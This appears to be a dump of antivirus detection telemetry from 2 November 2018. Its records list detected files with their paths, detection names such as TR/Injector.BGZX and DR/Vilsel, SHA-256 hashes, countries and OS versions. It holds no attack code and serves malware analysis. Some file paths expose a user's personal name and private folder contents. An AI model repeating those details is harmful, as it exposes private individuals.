  Row(detection=Row(filename='avscan-20181102-081401-31a76c1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081017-150DB878\\AVSCAN-20181102-081401-31A76C1A', filesize=64000, name='TR/Siggen.64000.6.#M1.#R1'), hash='3f8ad9886492f19d0be4d277a4600ae8044d3bda4f0d836239df36f6e3c4bd3a', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tprecvfs5_01120.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Testing Program 2016 Cloud\\Visor\\Flash\\TPRECVFS5_01120.exe', filesize=428000, name='HEUR/APC.#M1.#R1'), hash='0ec937cc8d5c8a2ec2afc81a80a7914f86c4c17c01b452803cfa811eecfb7061', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:28:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ly4ezxm_ywu.html', filepath='K:\\DRIVE E\\RIYAN\\RIYAN`s\\SKRIPSI & TESIS\\WILAS\\Tanah\\Aspek dan Implikasi Hukum dalam Pendaftaran Tanah dan Penertiban Sertifikat Hak-Hak atas Tanah - hukumonline.com_files\\lY4eZXm_YWu.html', filesize=56000, name='W32/Chir.B.#M1.#R1'), hash='1d5d761e685142f38b514b6c503d1f1f009175527a23545a9ed92aefb778aa8f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:12:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\Desktop\\msoxh\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T10:14:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131814-e0bc91c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-131814-E0BC91C5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:21:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050248-833ccbd8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050248-833CCBD8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-223421-4854f59e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cc160031\\AVSCAN-20181101-223112-2886A263\\AVSCAN-20181101-223421-4854F59E', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='4f505ca422d8fb8c70caf2c16671c84cae98f7cb77ae4486da13901fe0897c18', metadata=Row(cmdline=None, country='DO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:34:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rhino_6_patch.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa0.644\\rhino_6_patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1499088, timestamp='2018-11-02T18:02:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131609-c9735776', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-131609-C9735776', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:19:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00007671', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp00007671', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:53:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000075ae', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp000075ae', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:50:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113230-40211b64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aaa6c342\\AVSCAN-20181102-113117-37323689\\AVSCAN-20181102-113230-40211B64', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T10:32:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055223-70ad239f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055223-70AD239F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005233-0f933ec6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_26851843\\AVSCAN-20181103-005156-0A6B2668\\AVSCAN-20181103-005233-0F933EC6', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:52:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120458-10aff9f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120458-10AFF9F1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054245-1851e74b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054245-1851E74B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055221-6f2fdfe7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055221-6F2FDFE7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133252-c513ccac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4ca86332\\AVSCAN-20181102-131118-1FB9A0FB\\AVSCAN-20181102-133252-C513CCAC', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:32:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4badc1401f54853afb2ddb6af56587654b53373780a997941994a2641b4caf88', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4BADC1401F54853AFB2DDB6AF56587654B53373780A997941994A2641B4CAF88', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4badc1401f54853afb2ddb6af56587654b53373780a997941994a2641b4caf88', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053116-7da5d747', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053116-7DA5D747', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:46:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051501-38350d74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051501-38350D74', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4c3c5264f1fcc4edf677f6e9b2e97d6b60c7e315d720f11062392605e1c29fdf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4C3C5264F1FCC4EDF677F6E9B2E97D6B60C7E315D720F11062392605E1C29FDF', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='4c3c5264f1fcc4edf677f6e9b2e97d6b60c7e315d720f11062392605e1c29fdf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:41:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132517-2f5b2adc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-132517-2F5B2ADC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:28:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125152-babbd9d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-125152-BABBD9D7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:54:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053152-930c5e54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053152-930C5E54', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mansion.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\MANSION\\MANSION.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055526-dde8fe48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055526-DDE8FE48', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055537-e4634fcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055537-E4634FCB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060356-0de711b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060356-0DE711B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053827-7e4552a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053827-7E4552A8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061026-f6243834', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061026-F6243834', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060512-3ab3d903', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060512-3AB3D903', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052839-200fe18b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052839-200FE18B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055100-3f0a06eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055100-3F0A06EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053031-629fdfaa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053031-629FDFAA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055126-4e588a37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055126-4E588A37', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060451-2e76c458', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060451-2E76C458', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053449-fc1cae44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053449-FC1CAE44', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061700-e0d72442', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061700-E0D72442', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060340-04234cc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060340-04234CC9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060201-c903b104', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060201-C903B104', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052701-e57100f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052701-E57100F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050932-740401af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050932-740401AF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051309-f5c8a3c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051309-F5C8A3C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054715-b94473a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054715-B94473A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051407-1835a1ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051407-1835A1AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062636-38019869', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062636-38019869', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061916-322d8cf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061916-322D8CF7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:15Z'), dt=datetime.date(2018, 11, 2)),
